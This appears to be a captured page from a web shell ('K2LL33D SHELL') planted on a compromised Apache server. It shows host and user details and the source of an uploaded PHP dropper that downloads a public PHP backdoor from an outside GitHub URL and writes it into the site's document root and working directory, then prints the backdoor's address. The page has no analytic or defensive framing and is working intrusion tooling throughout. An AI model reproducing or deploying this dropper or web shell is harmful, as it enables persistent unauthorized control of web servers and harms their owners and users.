K2LL33D SHELL

 Apache
 Linux ip-172-31-16-45 2.6.32-642.13.1.el6.x86_64 #1 SMP Wed Jan 11 20:56:24 UTC 2017 x86_64
 uid=48(apache) gid=48(apache) groups=48(apache)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: ON | WGet: ON
  >  / export / www / blogs / 139 /
server ip : 13.230.91.54

your ip : 3.149.254.110

H O M E


Filename/export/www/blogs/139/82773_up-file.file.phpng
Size1.46 kb
Permissionrw-r--r--
Ownerapache
Create time22-Apr-2024 04:36
Last modified22-Apr-2024 04:36
Last accessed11-May-2024 07:20
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<?php
/*
403 FORBIDDEN BYPASS
WITH BACKDOOR RECALL / SHELL SUMMON
*/
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
$name = "0byte.php";

function _doEvil($name, $file) {
$filename = $name;
$getFile = file_get_contents($file);
$rootPath = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR;
$toRootFopen = fopen("$rootPath/$filename",'w');
$toRootExec = fwrite($toRootFopen, $getFile);
$rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]"."/$filename";
$realPath = getcwd().DIRECTORY_SEPARATOR;
$toRealFopen = fopen("$realPath/$filename",'w');
$toRealExec = fwrite($toRealFopen, $getFile);
$realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]".dirname($_SERVER[REQUEST_URI])."/$filename";
echo "<center>";
if($toRootExec) {
if(file_exists($rootPath."$filename")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$rootShellUrl\" target=\"_blank\">$rootShellUrl</a></font></h1>";
}
else {
echo "<h1><font color=\"red\">$rootPath$filename<br>Doesn't exist!</font>Try with another method!</h1>";
}
}
else {
if($toRealExec) {
if(file_exists($realPath."$filename")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$realShellUrl\" target=\"_blank\">$realShellUrl</a></font></h1>";
}
else {
echo "<h1><font color=\"red\">FAILED!</font></h1>";
}
}
}
echo "</center>";
}
_doEvil($name, $source);
?>